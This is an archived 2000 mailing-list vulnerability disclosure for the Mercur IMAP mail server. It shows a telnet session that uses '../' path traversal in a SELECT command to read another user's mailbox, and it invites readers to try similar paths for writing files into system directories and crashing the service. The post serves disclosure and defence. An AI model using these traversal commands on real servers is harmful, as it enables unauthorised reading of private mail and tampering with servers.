OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Security problems with Atrium Mercur Mailserver 3.20
From: Leonid Medevedv (home) (user07ASK-DESIGN.COM)
Date: Thu Apr 13 2000 - 13:23:18 CDT


Hello, List.
I even do not know, how to classify this vulnerability.
You can remotely read other users email,
you can remotely fill up server's HDD,
you can remotely put files anywhere on server (at least on drive, where mail
is stored)
you can sometimes crash it's IMAP service...

Simple scenario: remote user1 manage mail in user2 mailbox and even alter
filesystem anywhere on server's HDD

we>telnet target.mercur.mailserver 143

server>* OK MERCUR IMAP4-Server (v3.20.02 Unregistered) for Windows NT ready
at Thu, 13 Apr 2000 20:08:31 +0400

we>000c login user1 password1

server>000c OK LOGIN completed

we>00ab select inbox/../../user2/inbox

server>* 1 EXISTS
server>* 0 RECENT
server>* OK [UNSEEN 0]
server>* OK [UIDVALIDITY 878969124]
server>* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
server>00ab OK [READ-WRITE] SELECT completed

we>000e uid fetch 1:*(rfc822.header rfc822.size uid flags internaldate)

server>* 1 FETCH (UID 879030620 RFC822.SIZE 867 FLAGS (\Seen) INTERNALDATE
"12-Apr-2000 19:49:23 +0400")
server>* 2 FETCH (UID 879554127 RFC822.SIZE 1092 FLAGS (\Seen) INTERNALDATE
"13-Apr-2000 19:46:19 +0400")
server>000e OK UID FETCH completed

we>000f uid fetch 879030620 (body.peek[] uid)

server> sends us user2 mail message

Voila! We can read ANY message in ANY known user mailbox or folder.
But this is not the end :)
Mobilize your own fantazy and try other IMAP commands -
(especially that creates/deletes folders and sends data to server)
with paths like "..\..\..\..\.." or "..\..\..\..\..\WINNT\SYSTEM32" or
anything...
You not even need a telnet, and can try some IMAP-compliant mail clients.

btw, Mercur IMAP service crashes several (not every) times with paths,
containing dots and slashes.

Ufff... it was hard to me write so long letters in english :)
Bye!
------------------------------
Regards, Leonid Medvedev, MCP.
Online Organizer - http://mail.krossinform.ru
Unofficial Russian IELTS Page - http://www2.ask-design.com/ielts
Moscow, Russia.